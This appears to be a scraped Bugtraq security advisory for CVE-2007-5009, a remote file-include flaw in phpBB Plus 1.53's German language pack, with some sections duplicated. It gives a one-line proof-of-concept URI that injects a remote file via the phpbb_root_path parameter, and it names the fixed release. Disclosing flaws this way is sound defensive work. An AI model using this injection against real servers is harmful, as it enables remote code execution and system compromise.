PHPBB Plus German Language Pack PHPBB_Root_Path Parameter Remote File Include Vulnerability
BID:25737
Info
PHPBB Plus German Language Pack PHPBB_Root_Path Parameter Remote File Include Vulnerability
| Bugtraq ID: | 25737 |
| Class: | Input Validation Error |
| CVE: |
CVE-2007-5009 |
| Remote: | Yes |
| Local: | No |
| Published: | Sep 19 2007 12:00AM |
| Updated: | May 07 2015 05:35PM |
| Credit: | Mehrad Ansari Targhi is credited with the discovery of this vulnerability. |
| Vulnerable: |
phpBB2 phpBB2 Plus German Language Pack 0 phpBB2 phpBB2 Plus 1.53 |
| Not Vulnerable: |
phpBB2 phpBB2 Plus 1.53a |
Discussion
PHPBB Plus German Language Pack PHPBB_Root_Path Parameter Remote File Include Vulnerability
phpBB Plus is prone to a remote file-include vulnerability when the German language pack is installed, because the application fails to properly sanitize user-supplied input.
An attacker can exploit this issue to include arbitrary remote files containing malicious PHP code and execute it in the context of the webserver process. This may allow the attacker to compromise the application and the underlying system; other attacks are also possible.
This issue affects phpBB Plus 1.53; other versions may also be vulnerable.
phpBB Plus is prone to a remote file-include vulnerability when the German language pack is installed, because the application fails to properly sanitize user-supplied input.
An attacker can exploit this issue to include arbitrary remote files containing malicious PHP code and execute it in the context of the webserver process. This may allow the attacker to compromise the application and the underlying system; other attacks are also possible.
This issue affects phpBB Plus 1.53; other versions may also be vulnerable.
Exploit / POC
PHPBB Plus German Language Pack PHPBB_Root_Path Parameter Remote File Include Vulnerability
Attackers can exploit this issue via a browser.
The following proof-of-concept URI is available:
http://www.example.com/language/lang_german/lang_main_album.php?phpbb_root_path=[RFI]?a=
Attackers can exploit this issue via a browser.
The following proof-of-concept URI is available:
http://www.example.com/language/lang_german/lang_main_album.php?phpbb_root_path=[RFI]?a=
Solution / Fix
PHPBB Plus German Language Pack PHPBB_Root_Path Parameter Remote File Include Vulnerability
Solution:
The vendor released phpBB2 Plus 1.53a to address this issue. Please see the references for more information.
phpBB2 phpBB2 Plus 1.53
Solution:
The vendor released phpBB2 Plus 1.53a to address this issue. Please see the references for more information.
phpBB2 phpBB2 Plus 1.53
-
phpBB2 phpbb2_plus_1.53a.zip
http://www.phpbb2.de/dload.php?action=download&file_id=828
References
PHPBB Plus German Language Pack PHPBB_Root_Path Parameter Remote File Include Vulnerability
References:
References:
- phpBB2 Plus 1.53a Language File Vulnerable (phpBB2)
- phpBB2 Plus Homepage (phpBB2)
- PHPBBPLUS 1.5.3 RFI BUG (Mehrad Ansari Targhi)